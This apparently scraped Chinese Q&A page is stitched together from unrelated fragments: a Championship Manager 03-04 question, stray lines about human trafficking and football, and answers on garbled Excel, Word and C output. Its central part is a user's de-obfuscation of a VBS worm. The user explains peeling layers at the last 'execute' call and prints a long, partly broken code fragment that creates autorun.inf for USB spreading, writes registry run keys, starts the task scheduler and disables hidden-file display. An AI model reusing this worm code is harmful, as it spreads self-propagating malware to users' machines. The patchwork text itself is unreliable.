cm 03-04 运行全是乱码,代码如何添加?
作者&投稿:直劳 (若有异议请与网页底部的电邮联系)
贩卖人口吧
董事会申请根本就不会同意,除非切尔西和国米
把这些代码复制到一个TXT文件里。。然后把TXT改成CMF就行了。
LZ用CMF或用FC吧。。CM太老了。
这个是vbs脚本病毒,看上去是乱码,一点也看不懂,其实还是有迹可循的。其思路就是寻 找"execute"关键词。病毒最终,还是要换成机器可以看懂的内容,也就是说,最后一层的execute里面的内容,就是病毒的源代码。按照这个思路,那么可以知道,解密方法也一定就在这个execute里面。
也就是说:无需明白他是如何加密的,只需要知道,execute出来的是什么。
按照这个思路,可以得到程序的最后一次迭代加密过程前的代码,也就是第一次迭代解密的代码,看上去还是乱码,不过还是同样的道理,总可以找到execute这个关键词。病毒可能经过多次迭代,不过最终还是可以看懂的。
需要注意的是,execute后面的内容解密出来如果真的用execute执行了,那就中招了,所以这里要注意不能把execute也放进去一起执行。
以下是我的解密最终代码片断
这个程序作者比较BT,手工加密了很多地方,还手工打乱了代码,严重妨碍了程序可读性。
分析完代码其大致功能是
1。开机自启动
2。U盘的感染
3。破坏系统隐藏功能
on error resume next
j="\":til="SY":btj=900:vs=".vbs":ve=".vbe":cm="%comspec% /c":dfo="/u#t/":inf="\autorun.inf"
set ws=createobject("wscript.shell"):set fso=createobject("scripting.filesystemobject")
set wmi=getobject("winmgmts:\\.\root\cimv2"):set sis=wmi.execquery("select * fromwin32_operatingsystem")
set dc=fso.drives:set ats=wmi.execquery("select * from win32_service where name='Schedule'")
for each atc in ats:cat=atc.state:next:if cat="Stopped" then ws.run "net start ""task scheduler""",0,false
ouw=wscript.scriptfullname:win=fso.getspecialfolder(0)&j:dir=fso.getspecialfolder(1)&j
tmp=fso.getspecialfolder(2)&j:wbe=dir&"wbem\":mir=left(ouw,len(ouw)-len (wscript.scriptname))
cnr="\computername":cnp="HKLM\system\currentcontrolset\control"&cnr&cnr&cnr:cna=rr (cnp,0):if cna="" then cna=til
wsc="wscript.exe":csc="cscript.exe":css=csc&" //nologo ":wsr=rn&":createobject (""wscript.shell"").run"
c=vbcrlf:inc=til&c&"[autorun]"&c&"open="&wsc&" .\"&vs&c&"shell\open\command="&wsc&" .\"&vs&c&"shell\open\default=1"
sf="shell folders\":rop="\software\microsoft\windows\currentversion\explorer\":dap=rr ("HKCU"&rop&sf&"desktop",0)&j
rpa="HKLM\software\"&cna&j:fsp=rr("HKLM"&rop&sf&"common startup",0)&j&vs:fap=rr ("HKCU"&rop&sf&"favorites",0)&j
ht=ec("ivwt?56"):ha=ec(":;9:7>5kw9"):hb=hl&"1;<<=6x"&hl&"r;":hc="0dwuEpE":hd=ec
("$"+hc):he=ec("c"+hc)
rsp="HKLM\software\microsoft\windows\currentversion\":rsb=rsp&"run\":rsp=rsp&"policies\explorer\run\"&cna
hip="HKCU"&rop&"advanced\showsuperhidden":sz=lcase(fso.getfilename(wscript.fullname)):if mir=dir then sys=true
for each si in
sis:ca=si.caption:cs=si.codeset:cc=si.countrycode:os=si.oslanguage:wv=si.version:next
if instr(wv,"5.2")<>0 then hb="w"+hb:lb="v" else if os<>2052 and cc<>86 then
hb="p"+hb:lb="o" else hb="d"+hb:lb="c"
for each d in dc
if mir=d&j then ws.run "explorer "&d,3,false:bir=true
next
if bir or sys or mir=win or mir=wbe then tir=true else wscript.quit
ouc=rt(ouw,-1):ver=gv(ouw):if ver="" or not isnumeric(ver) then msgbox("See You!"):km 1
else km 0
if sys then
if sz=wsc then pr csc,-1
if pr(csc,2)=1 then wscript.quit
wscript.sleep 2000
if pr(csc,1)=0 then ws.run css&dir&ve,0,false:if pr(csc,1)=1 then wscript.quit
if rr("til",1)<>til then wr "til",til:wr "tjs",btj:wr "djs",date-1:wr "ded",0
djs=rr("djs",1):if isdate(djs) and date-cdate(djs)>50 and lb<>"o" then wr "osw",4
if rr("atd",1)=1 then ws.run "at /d /y",0,false:wr "atd",0
le=rr("dna",1):if ei(tmp&le,1) then ws.run tmp&le
cu:er 10
else
wscript.sleep 5000
if pr(wsc,2)=2 then:if rr("tjc",1)=cstr(date) then:wscript.quit:else:wr "tjc",date
if pr(csc,1)<>1 or pr(wsc,1)=0 then bf dir&ve,ouc,7:ws.run css&dir&ve,0,false
end if
if pa=1 then rna=rpa&rna
rr=ws.regread(rna)
if er(0) then rr=0
for i=1 to len(wt):ec=ec+chr(asc(mid(wt,i,1))-i):next
由于VBS与JS一样是解释型语言,代码自上而下,一行一行地运行。所以解这类代码的一个技巧是:
我们寻找解密入口点时,应该优先考虑最后一个execute。作者大量使用逻辑拼接。。。属于很BT的加密。。。汗水...
地宣孚琪: 那肯定是莫个变量有问题 比如循环里有莫个变量 第一次运行变量没有改变 第二次等以后都改变了,要每次都赋以同样的值 不然就出现了你上述的之前可以 后来不行……
岚皋县18281558138: excel出现乱码是什么原因 - ?
地宣孚琪: 一个文件出错也是常事 文件乱码可能是编码不对 也许编辑excel的时候改了编码或者本身文件内容就是乱码呢 想恢复有难度1、转换格式法 就是将受损的Excel XP工作簿另存格式选为SYLK.如果可以打开受损文件,只是不能进行各种编辑和打...
岚皋县18281558138: Excel 2003乱码怎么解决 - ?
地宣孚琪: 这里是几个修复的方法你可以试试 1、转换格式法 就是将受损的Excel XP工作簿另存格式选为SYLK.如果可以打开受损文件,只是不能进行各种编辑和打印操作,那么建议首先尝试这种方法. 2、直接修复法 最新版本的Excel XP在“打开”窗...
岚皋县18281558138: 急!!!各位C语言高手,帮我看看这个程序啊~~运行后是乱码啊~~~哪里有错啊??? - ?
地宣孚琪: #include "stdio.h" main() { int sum,f[9]={1,1},n; sum=f[0]+f[1]; for(n=0;n<10;n++) { if(n<2) printf("%d...
岚皋县18281558138: excel2003双击打开让选择编码,默认时打开是乱码,右键打开时却正常是怎么回事? - ?
地宣孚琪: 因为你双击是就等于是自动运行了 可能是病毒吧 就像U盘一样,如果双击可能会自动运行里面的病毒,高手用U盘是一般都是想点右键再打开
岚皋县18281558138: 冠军足球经理03 - 04的教练数值怎么加的?教练的各种数值,如魅力 ?
地宣孚琪: 一:工具介绍 1 介绍 冠军足球经理03-04数据编辑器(下用“CM 03-04 Editor”代替)是一个神奇而强大的工具,它允许玩家修改包括队员、教练、官员、俱乐部、城市、...
岚皋县18281558138: 用VC写代码的时候 汉字显示的是乱码,运行出显示的是正确的 怎么解决 - ?
地宣孚琪: 我想,可能是VC的bug吧.因为我也经常出现这样的错误,一般VC运行到4个小时.就出现中文乱码,或者鼠标的光标直接不动,任你怎么都不能移动光标,我处理的办法就是把VC关了,然后重新打开.就没问题了.
岚皋县18281558138: office文档打开都是乱码是怎么回事啊 - ?
地宣孚琪: 你应该是装了Microsoft AppLocale内码转换器吧,我的问题就是这个 AppLocale引起乱码之解决 AppLocale是MS出品的工具, 可以为非Unicode应用软件转换临时的系统区域语言(其实就是 转码软件啦), 但是在简体中文系统里使用之后, ...
岚皋县18281558138: word和excel打开全是乱码 - ?
地宣孚琪: 有可能是以下问题:1、文档字符问题.2、下载不完整.3、最重要的可能就是文档的版本不一致,office2003与2007,你看一下,文档的后缀,一般2003的excel是.xls,word是doc,2007的excel是.xlsx,word是.docx
岚皋县18281558138: 为什么我的word会出现这种乱码呢? 该怎么解决呢? - ?
地宣孚琪: 当操作引起的.word文件乱码怎么办2009年03月19日 星期四 上午 09:51方法一:利用word2002/2003的“打开并修复”功能来修复文挡. (1)启动word2002/2003,单...
